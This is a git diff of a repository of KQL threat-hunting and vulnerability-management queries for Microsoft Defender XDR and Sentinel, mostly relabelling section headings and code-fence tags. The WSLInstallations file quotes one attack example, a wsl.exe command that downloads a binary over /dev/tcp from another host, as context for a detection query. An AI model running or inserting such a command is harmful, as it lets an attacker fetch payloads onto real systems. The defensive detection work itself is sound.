diff --git a/Defender For Identity/AnomalousGroupPolicyDiscovery.md b/Defender For Identity/AnomalousGroupPolicyDiscovery.md index 4d7f31a..5077398 100644 --- a/Defender For Identity/AnomalousGroupPolicyDiscovery.md +++ b/Defender For Identity/AnomalousGroupPolicyDiscovery.md @@ -17,8 +17,7 @@ Potential false positive is a new Administrator that has not performed group pol An attacker queries Group Policy object to gain valuable information about the environment. ## Defender For Endpoint - -``` +```KQL let PreviousActivity = materialize ( IdentityQueryEvents | where Timestamp > ago(30d) @@ -31,7 +30,7 @@ IdentityQueryEvents | where not(DeviceName has_any(PreviousActivity)) ``` ## Sentinel -``` +```KQL let PreviousActivity = materialize ( IdentityQueryEvents | where TimeGenerated > ago(30d) diff --git a/Defender For Identity/AnomalousLDAPTraffic.md b/Defender For Identity/AnomalousLDAPTraffic.md index 155ef7a..7a95f53 100644 --- a/Defender For Identity/AnomalousLDAPTraffic.md +++ b/Defender For Identity/AnomalousLDAPTraffic.md @@ -28,7 +28,7 @@ An adversary has gained access to your network and performes LDAP queries to per - https://www.microsoft.com/en-us/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/ ## Defender For Endpoint -``` +```KQL // Variables to define the anomalous behaviour let starttime = 30d; let endtime = 1d; @@ -62,7 +62,7 @@ TimeSeriesAlerts | where PerHourCount > TotalEventsThreshold ``` ## Sentinel -``` +```KQL // Variables to define the anomalous behaviour let starttime = 90d; let endtime = 1d; diff --git a/Defender For Identity/UserAddedToSensitiveGroup.md b/Defender For Identity/UserAddedToSensitiveGroup.md index 17cf007..b23175c 100644 --- a/Defender For Identity/UserAddedToSensitiveGroup.md +++ b/Defender For Identity/UserAddedToSensitiveGroup.md @@ -20,8 +20,7 @@ A attacker has added themself to a sensitive group and can perform priviliges ac - https://learn.microsoft.com/en-us/defender-for-identity/entity-tags#sensitive-entities ### Defender For Endpoint - -``` +```KQL let SensitiveGroups = dynamic(['Domain Admins', 'Enterprise Admins', 'Exchange Admins']); // Add your sensitive groups to this list IdentityDirectoryEvents | where Timestamp > ago(30d) @@ -32,7 +31,7 @@ IdentityDirectoryEvents | where Group has_any (SensitiveGroups) ``` ### Sentinel -``` +```KQL let SensitiveGroups = dynamic(['Domain Admins', 'Enterprise Admins', 'Exchange Admins']); // Add your sensitive groups to this list IdentityDirectoryEvents | where TimeGenerated > ago(30d) diff --git a/Vulnerability Management/Active-EOS-Software.md b/Vulnerability Management/Active-EOS-Software.md index 6a8ea5f..ea92acd 100644 --- a/Vulnerability Management/Active-EOS-Software.md +++ b/Vulnerability Management/Active-EOS-Software.md @@ -1,6 +1,6 @@ # End of Support software used ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmSoftwareInventory | where EndOfSupportStatus == "EOS Version" or EndOfSupportStatus == diff --git a/Vulnerability Management/BrowserExtension - InstalledExtensionsWithNotificationPermissions.md b/Vulnerability Management/BrowserExtension - InstalledExtensionsWithNotificationPermissions.md index 7050975..570b34a 100644 --- a/Vulnerability Management/BrowserExtension - InstalledExtensionsWithNotificationPermissions.md +++ b/Vulnerability Management/BrowserExtension - InstalledExtensionsWithNotificationPermissions.md @@ -1,6 +1,6 @@ # Query the installed extensions with the most required permissions ---- -### Defender For Endpoint +### Defender XDR ``` let ExtentionsWithNotification = DeviceTvmBrowserExtensionsKB | where PermissionId contains "Notification" diff --git a/Vulnerability Management/BrowserExtension - InstalledExtensionsWithTheMostRequiredPermissions.md b/Vulnerability Management/BrowserExtension - InstalledExtensionsWithTheMostRequiredPermissions.md index 919c577..ec1ba8d 100644 --- a/Vulnerability Management/BrowserExtension - InstalledExtensionsWithTheMostRequiredPermissions.md +++ b/Vulnerability Management/BrowserExtension - InstalledExtensionsWithTheMostRequiredPermissions.md @@ -1,6 +1,6 @@ # Query the installed extensions with the most required permissions ---- -### Defender For Endpoint +### Defender XDR ``` let PermissionInformation = DeviceTvmBrowserExtensionsKB | where IsPermissionRequired == "true" diff --git a/Vulnerability Management/BrowserExtension - Top100DevicesWithTheMostBrowserExtensions.md b/Vulnerability Management/BrowserExtension - Top100DevicesWithTheMostBrowserExtensions.md index 49dd1b9..ca85c87 100644 --- a/Vulnerability Management/BrowserExtension - Top100DevicesWithTheMostBrowserExtensions.md +++ b/Vulnerability Management/BrowserExtension - Top100DevicesWithTheMostBrowserExtensions.md @@ -1,6 +1,6 @@ # Top 100 devices with the most browser extensions installed ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmBrowserExtensions | summarize diff --git a/Vulnerability Management/BrowserExtension - Top100MostPermissiveExtensionsInstalled.md b/Vulnerability Management/BrowserExtension - Top100MostPermissiveExtensionsInstalled.md index 82645e1..ef191f4 100644 --- a/Vulnerability Management/BrowserExtension - Top100MostPermissiveExtensionsInstalled.md +++ b/Vulnerability Management/BrowserExtension - Top100MostPermissiveExtensionsInstalled.md @@ -1,6 +1,6 @@ # Top 100 critical browser extensions with the most permissions required ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmBrowserExtensions | where ExtensionRisk == "Critical" diff --git a/Vulnerability Management/CISAKnowExploitsVulnerabilitiesDeviceTotal.md b/Vulnerability Management/CISAKnowExploitsVulnerabilitiesDeviceTotal.md index 6307d16..8c7d25f 100644 --- a/Vulnerability Management/CISAKnowExploitsVulnerabilitiesDeviceTotal.md +++ b/Vulnerability Management/CISAKnowExploitsVulnerabilitiesDeviceTotal.md @@ -11,7 +11,7 @@ The vulnerabilities is known to be exploited by threat actors, thus depending on #### References - https://www.cisa.gov/known-exploited-vulnerabilities-catalog -### Defender For Endpoint +### Defender XDR ``` Devices with the most know exploited vulnerabilities let KnowExploitesVulnsCISA = externaldata(cveID: string, vendorProject: string, product: string, vulnerabilityName: string, dateAdded: datetime, shortDescription: string, requiredAction: string, dueDate: datetime, diff --git a/Vulnerability Management/CISAKnowExploitsVulnerabilitiesTotalVulnerableDevices.md b/Vulnerability Management/CISAKnowExploitsVulnerabilitiesTotalVulnerableDevices.md index 24fa42c..d04a829 100644 --- a/Vulnerability Management/CISAKnowExploitsVulnerabilitiesTotalVulnerableDevices.md +++ b/Vulnerability Management/CISAKnowExploitsVulnerabilitiesTotalVulnerableDevices.md @@ -1,6 +1,6 @@ # Total vulnerable devices for known exploited vulnerabilities from CISA ---- -### Defender For Endpoint +### Defender XDR ``` let KnowExploitesVulnsCISA = externaldata(cveID: string, vendorProject: string, product: string, vulnerabilityName: string, dateAdded: datetime, diff --git a/Vulnerability Management/CVEWithMetaSploitExploitDeviceTotal.md b/Vulnerability Management/CVEWithMetaSploitExploitDeviceTotal.md index 14a486a..42b649c 100644 --- a/Vulnerability Management/CVEWithMetaSploitExploitDeviceTotal.md +++ b/Vulnerability Management/CVEWithMetaSploitExploitDeviceTotal.md @@ -1,6 +1,6 @@ # Vulnerabilities that have an exploit available in MetaSploit by device ---- -### Defender For Endpoint +### Defender XDR ``` let MetaSploitExploitsWithAssignedCVE = externaldata(cveid: string)[@"https://feeds.ecrimelabs.net/data/metasploit-cve"] with (format="txt", ignoreFirstRecord=True); DeviceTvmSoftwareVulnerabilities diff --git a/Vulnerability Management/Curl-CVE-2023-38545.md b/Vulnerability Management/Curl-CVE-2023-38545.md index 27dea4a..1ef24d0 100644 --- a/Vulnerability Management/Curl-CVE-2023-38545.md +++ b/Vulnerability Management/Curl-CVE-2023-38545.md @@ -5,7 +5,7 @@ #### Description The maintainers of curl have informed us about two vulnerabilities in the software that will be fixed on the 11th of october. CVE-2023-38545 has a high serverity and affects both libcurl and the curl tool. This page can help you identify systems that run curl beforehand, in order for you to take imidiate action if needed. As advised by multiple security organisations your company should create an inventory of all systems that run curl. This can be done by running the following query in Defender For Endpoint. -### Defender For Endpoint +### Defender XDR ``` // List all devices that have curl installed or use curl. let ProcessBasedDevices = DeviceProcessEvents @@ -25,7 +25,7 @@ DeviceTvmSoftwareInventory //| distinct CombinedId, CombinedName ``` -### Defender For Endpoint +### Defender XDR ``` // List devices that have not been patched yet. // This query will only show results after MDE has indexed the vulnerable devices, thus no results are expected before the 11th of October. diff --git a/Vulnerability Management/CveLookup.md b/Vulnerability Management/CveLookup.md index 299b9ea..979fe10 100644 --- a/Vulnerability Management/CveLookup.md +++ b/Vulnerability Management/CveLookup.md @@ -1,6 +1,6 @@ # Lookup vulnerability information based on a CveID ---- -### Defender For Endpoint +### Defender XDR ``` let CVE = "CVE-2022-3602"; // Add your CVEid here DeviceTvmSoftwareVulnerabilities diff --git a/Vulnerability Management/Device-Configuration-Not-Compliant.md b/Vulnerability Management/Device-Configuration-Not-Compliant.md index 2693cdc..403187d 100644 --- a/Vulnerability Management/Device-Configuration-Not-Compliant.md +++ b/Vulnerability Management/Device-Configuration-Not-Compliant.md @@ -1,6 +1,6 @@ # Device congifuration not compliant ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmSecureConfigurationAssessment | join DeviceTvmSecureConfigurationAssessmentKB on ConfigurationId diff --git a/Vulnerability Management/Device-EDR-Configuration-Not-Compliant.md b/Vulnerability Management/Device-EDR-Configuration-Not-Compliant.md index b86e11b..6f61afe 100644 --- a/Vulnerability Management/Device-EDR-Configuration-Not-Compliant.md +++ b/Vulnerability Management/Device-EDR-Configuration-Not-Compliant.md @@ -1,6 +1,6 @@ # Device EDR settings are not compliant ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmSecureConfigurationAssessment | join DeviceTvmSecureConfigurationAssessmentKB on ConfigurationId diff --git a/Vulnerability Management/Devices-With-Recent-Exploitable-Vulnerability.md b/Vulnerability Management/Devices-With-Recent-Exploitable-Vulnerability.md index c8c1d03..019431c 100644 --- a/Vulnerability Management/Devices-With-Recent-Exploitable-Vulnerability.md +++ b/Vulnerability Management/Devices-With-Recent-Exploitable-Vulnerability.md @@ -1,6 +1,6 @@ # Devices with a recent vulnerability that is exploitable ---- -### Defender For Endpoint +### Defender XDR ``` let timeframe = 30d; //Customizable h = hours, d = days let ExploitableVulnerabilities = materialize diff --git a/Vulnerability Management/DomainControllersWithTheMostVulnerabilities.md b/Vulnerability Management/DomainControllersWithTheMostVulnerabilities.md index dfc7409..323909c 100644 --- a/Vulnerability Management/DomainControllersWithTheMostVulnerabilities.md +++ b/Vulnerability Management/DomainControllersWithTheMostVulnerabilities.md @@ -1,6 +1,6 @@ # Domain Controllers with the most vulnerabilities ---- -### Defender For Endpoint +### Defender XDR ``` let AllDomainControllers = DeviceNetworkEvents diff --git a/Vulnerability Management/DueDatePassedCISAKnownExploitedVulnerability.md b/Vulnerability Management/DueDatePassedCISAKnownExploitedVulnerability.md index 7de5b2b..868ad75 100644 --- a/Vulnerability Management/DueDatePassedCISAKnownExploitedVulnerability.md +++ b/Vulnerability Management/DueDatePassedCISAKnownExploitedVulnerability.md @@ -14,7 +14,7 @@ Known exploited vulnerabilities are actively exploited by adversaries and need t - https://www.cisa.gov/known-exploited-vulnerabilities-catalog - https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv -## Defender For Endpoint +## Defender XDR ```KQL let KnowExploitesVulnsCISA = externaldata(cveID: string, vendorProject: string, product: string, vulnerabilityName: string, dateAdded: datetime, shortDescription: string, requiredAction: string, dueDate: datetime, notes: string)[@"https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv"] with (format="csv", ignoreFirstRecord=True); DeviceTvmSoftwareVulnerabilities @@ -35,4 +35,4 @@ DeviceTvmSoftwareVulnerabilities | extend DueDateExceededByDays = datetime_diff('day', now(), dueDate), TotalVulnerableDevices = array_length(VulnerableDevices) | project-reorder CveId, vendorProject, DueDateExceededByDays, TotalVulnerableDevices | sort by DueDateExceededByDays, TotalVulnerableDevices -``` \ No newline at end of file +``` diff --git a/Vulnerability Management/InboundSSHConnectionToVulnerableXZMachine.md b/Vulnerability Management/InboundSSHConnectionToVulnerableXZMachine.md index c7976f0..6b0efa8 100644 --- a/Vulnerability Management/InboundSSHConnectionToVulnerableXZMachine.md +++ b/Vulnerability Management/InboundSSHConnectionToVulnerableXZMachine.md @@ -22,7 +22,7 @@ Exploitation of CVE-2024-3094. - https://www.cisa.gov/news-events/alerts/2024/03/29/reported-supply-chain-compromise-affecting-xz-utils-data-compression-library-cve-2024-3094 - https://www.openwall.com/lists/oss-security/2024/03/29/4 -## Defender For Endpoint +## Defender XDR ```KQL let VulnerableXZDevices = DeviceTvmSoftwareInventory | where SoftwareName has "xz" @@ -47,4 +47,4 @@ DeviceNetworkEvents | where InitiatingProcessFileName contains "ssh" | extend GeoIPInfo = geo_info_from_ip_address(RemoteIP) | extend country = tostring(parse_json(GeoIPInfo).country), state = tostring(parse_json(GeoIPInfo).state), city = tostring(parse_json(GeoIPInfo).city), latitude = tostring(parse_json(GeoIPInfo).latitude), longitude = tostring(parse_json(GeoIPInfo).longitude) -``` \ No newline at end of file +``` diff --git a/Vulnerability Management/InternetFacingDevicesWithAvailableExploits.md b/Vulnerability Management/InternetFacingDevicesWithAvailableExploits.md index 9428577..fffd5c6 100644 --- a/Vulnerability Management/InternetFacingDevicesWithAvailableExploits.md +++ b/Vulnerability Management/InternetFacingDevicesWithAvailableExploits.md @@ -18,7 +18,7 @@ The risk of exploits on internet facing servers is higher, because they could be - https://attack.mitre.org/techniques/T1190/ - https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/discovering-internet-facing-devices-using-microsoft-defender-for/ba-p/3778975 -### Defender For Endpoint +### Defender XDR ``` // Collect all internet facing devices let InternetFacingDevices = DeviceInfo diff --git a/Vulnerability Management/MostExploitedVulnerabilities2022.md b/Vulnerability Management/MostExploitedVulnerabilities2022.md index ac9a845..78376d4 100644 --- a/Vulnerability Management/MostExploitedVulnerabilities2022.md +++ b/Vulnerability Management/MostExploitedVulnerabilities2022.md @@ -35,7 +35,7 @@ Codeblock source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23 - https://www.bleepingcomputer.com/news/security/fbi-cisa-and-nsa-reveal-top-exploited-vulnerabilities-of-2022/ - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a -### Defender For Endpoint +### Defender XDR ``` // Listing of the most exploited vulnerabilities of 2022. let 2022MostExploited = dynamic(['CVE-2021-34473', 'CVE-2021-31207', 'CVE-2021-34523', 'CVE-2018-13379', 'CVE-2021-40539', 'CVE-2021-26084', 'CVE-2021- 44228', 'CVE-2022-22954', 'CVE-2022-22960', 'CVE-2022-1388', 'CVE-2022-30190', 'CVE-2022-26134']); diff --git a/Vulnerability Management/NewActiveCISAKnownExploitedVulnerabilityDetected.md b/Vulnerability Management/NewActiveCISAKnownExploitedVulnerabilityDetected.md index 4d4d141..3c72eff 100644 --- a/Vulnerability Management/NewActiveCISAKnownExploitedVulnerabilityDetected.md +++ b/Vulnerability Management/NewActiveCISAKnownExploitedVulnerabilityDetected.md @@ -20,7 +20,7 @@ Known exploited vulnerabilities are actively exploited by adversaries and need t - https://www.cisa.gov/known-exploited-vulnerabilities-catalog - https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv -## Defender For Endpoint +## Defender XDR ```KQL // Define new let NewThreshold = 1d; @@ -46,4 +46,4 @@ DeviceTvmSoftwareVulnerabilities | where dateAdded > ago(NewThreshold)) on $left.CveId == $right.cveID | project-reorder DeviceName, CveId, vendorProject, vulnerabilityName, dateAdded, shortDescription -``` \ No newline at end of file +``` diff --git a/Vulnerability Management/OpenSSLVulnerableDevices.md b/Vulnerability Management/OpenSSLVulnerableDevices.md index c566a29..ca7e6f6 100644 --- a/Vulnerability Management/OpenSSLVulnerableDevices.md +++ b/Vulnerability Management/OpenSSLVulnerableDevices.md @@ -1,6 +1,6 @@ # List all the vulnerable devices for the OpenSSL critical vulnerability (nov 2022) ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmSoftwareInventory | where SoftwareName contains "openssl" diff --git a/Vulnerability Management/Pivot - DeviceVulnerabilities.md b/Vulnerability Management/Pivot - DeviceVulnerabilities.md index f5b62c3..b578776 100644 --- a/Vulnerability Management/Pivot - DeviceVulnerabilities.md +++ b/Vulnerability Management/Pivot - DeviceVulnerabilities.md @@ -5,7 +5,7 @@ #### Description This query returns a row for each device with the amount of Critical, High, Medium and Low Vulnerabilities that device has. -## Defender For Endpoint +## Defender XDR ``` DeviceTvmSoftwareVulnerabilities | project DeviceName, VulnerabilitySeverityLevel diff --git a/Vulnerability Management/PrioritizeSecureConfiguration.md b/Vulnerability Management/PrioritizeSecureConfiguration.md index 130b505..9efa8a3 100644 --- a/Vulnerability Management/PrioritizeSecureConfiguration.md +++ b/Vulnerability Management/PrioritizeSecureConfiguration.md @@ -15,4 +15,4 @@ DeviceTvmSecureConfigurationAssessment | join kind=inner DeviceTvmSecureConfigurationAssessmentKB on ConfigurationId | sort by ConfigurationImpact, TotalDevices | project-reorder ConfigurationId, ConfigurationImpact, TotalDevices, ConfigurationName, ConfigurationCategory, ConfigurationSubcategory -``` \ No newline at end of file +``` diff --git a/Vulnerability Management/SentinelAnalyticsRuleNewCISAKnowExploitedVulnerabilityAdded.md b/Vulnerability Management/SentinelAnalyticsRuleNewCISAKnowExploitedVulnerabilityAdded.md index 0729c14..fc2d023 100644 --- a/Vulnerability Management/SentinelAnalyticsRuleNewCISAKnowExploitedVulnerabilityAdded.md +++ b/Vulnerability Management/SentinelAnalyticsRuleNewCISAKnowExploitedVulnerabilityAdded.md @@ -96,4 +96,4 @@ KnowExploitesVulnsCISA } ] } -``` \ No newline at end of file +``` diff --git a/Vulnerability Management/Top-Devices-Most-Exploitable-Vulnerabilities.md b/Vulnerability Management/Top-Devices-Most-Exploitable-Vulnerabilities.md index a8508c3..53eb046 100644 --- a/Vulnerability Management/Top-Devices-Most-Exploitable-Vulnerabilities.md +++ b/Vulnerability Management/Top-Devices-Most-Exploitable-Vulnerabilities.md @@ -1,6 +1,6 @@ # Top 10 devices with the most exploitable vulnerabilities ---- -### Defender For Endpoint +### Defender XDR ``` let ExploitableVulnerabilities = materialize (DeviceTvmSoftwareVulnerabilitiesKB diff --git a/Vulnerability Management/Top-Devices-Most-Vulnerabilities.md b/Vulnerability Management/Top-Devices-Most-Vulnerabilities.md index 2a48509..5ee5fbe 100644 --- a/Vulnerability Management/Top-Devices-Most-Vulnerabilities.md +++ b/Vulnerability Management/Top-Devices-Most-Vulnerabilities.md @@ -1,6 +1,6 @@ # Top 10 devices with the most Critical and High vulnerabilities ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmSoftwareVulnerabilities | where VulnerabilitySeverityLevel has_any ('critical', 'High') diff --git a/Vulnerability Management/Upcomming-EOS-Software.md b/Vulnerability Management/Upcomming-EOS-Software.md index dccd6c2..0af4f49 100644 --- a/Vulnerability Management/Upcomming-EOS-Software.md +++ b/Vulnerability Management/Upcomming-EOS-Software.md @@ -1,6 +1,6 @@ # Upcomming End of Support software used ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmSoftwareInventory | where EndOfSupportStatus == "Upcoming EOS Version" diff --git a/Vulnerability Management/Visualization - BrowserExtension - MostCommonCricitalExtensions.md b/Vulnerability Management/Visualization - BrowserExtension - MostCommonCricitalExtensions.md index 0ec80b4..c1fe08d 100644 --- a/Vulnerability Management/Visualization - BrowserExtension - MostCommonCricitalExtensions.md +++ b/Vulnerability Management/Visualization - BrowserExtension - MostCommonCricitalExtensions.md @@ -1,6 +1,6 @@ # Most common installed cricital extensions visualised ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmBrowserExtensions | where ExtensionRisk == "Critical" diff --git a/Vulnerability Management/Visualization - ExposureLevels.md b/Vulnerability Management/Visualization - ExposureLevels.md index 8ef59e4..fde9ec5 100644 --- a/Vulnerability Management/Visualization - ExposureLevels.md +++ b/Vulnerability Management/Visualization - ExposureLevels.md @@ -8,7 +8,7 @@ This query visualizes the onboarded devices and their exposure level in a PieCha #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-vulnerability-management/tvm-exposure-score?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL DeviceInfo | where Timestamp > ago(30d) @@ -25,4 +25,4 @@ DeviceInfo | summarize arg_max(TimeGenerated, *) by DeviceId | summarize Total = count() by ExposureLevel | render piechart with(title="Overview Exposure Level") -``` \ No newline at end of file +``` diff --git a/Vulnerability Management/Visualization - VulnerabilitiesBySeverity.md b/Vulnerability Management/Visualization - VulnerabilitiesBySeverity.md index e91ef0d..ccebeea 100644 --- a/Vulnerability Management/Visualization - VulnerabilitiesBySeverity.md +++ b/Vulnerability Management/Visualization - VulnerabilitiesBySeverity.md @@ -1,6 +1,6 @@ # Vulnerabilities visualized in a Piechart ---- -### Defender For Endpoint +### Defender XDR ``` DeviceTvmSoftwareVulnerabilities | summarize count() by VulnerabilitySeverityLevel diff --git a/Vulnerability Management/VulnerabilitiesWithAvailablePOC.md b/Vulnerability Management/VulnerabilitiesWithAvailablePOC.md index e482bc4..57c11fb 100644 --- a/Vulnerability Management/VulnerabilitiesWithAvailablePOC.md +++ b/Vulnerability Management/VulnerabilitiesWithAvailablePOC.md @@ -11,7 +11,7 @@ The vulnerabilities is known to be have a POC available, which increases the cha #### References - https://github.com/tg12/PoC_CVEs -### Defender For Endpoint +### Defender XDR ``` // Extract the CVE IDs that have an available POC let VulnerabilitiesWithPOC = externaldata(CVE: string, URL: string )[@"https://raw.githubusercontent.com/tg12/PoC_CVEs/main/cve_links.csv"] with (format="csv", ignoreFirstRecord=True); diff --git a/Vulnerability Management/WSLInstallations.md b/Vulnerability Management/WSLInstallations.md index d0b4d30..141ea00 100644 --- a/Vulnerability Management/WSLInstallations.md +++ b/Vulnerability Management/WSLInstallations.md @@ -19,7 +19,7 @@ wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules -## Defender For Endpoint +## Defender XDR ``` let WSLDevices = DeviceProcessEvents | where Timestamp > ago(30d) @@ -28,4 +28,4 @@ let WSLDevices = DeviceProcessEvents DeviceInfo | where DeviceId in (WSLDevices) | summarize arg_max(Timestamp, *) by DeviceId -``` \ No newline at end of file +``` diff --git a/Vulnerability Management/WeakSSHVersionUsed.md b/Vulnerability Management/WeakSSHVersionUsed.md index ac9f480..47ee351 100644 --- a/Vulnerability Management/WeakSSHVersionUsed.md +++ b/Vulnerability Management/WeakSSHVersionUsed.md @@ -1,6 +1,6 @@ # Detect the usage of weak SSH sessions ---- -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents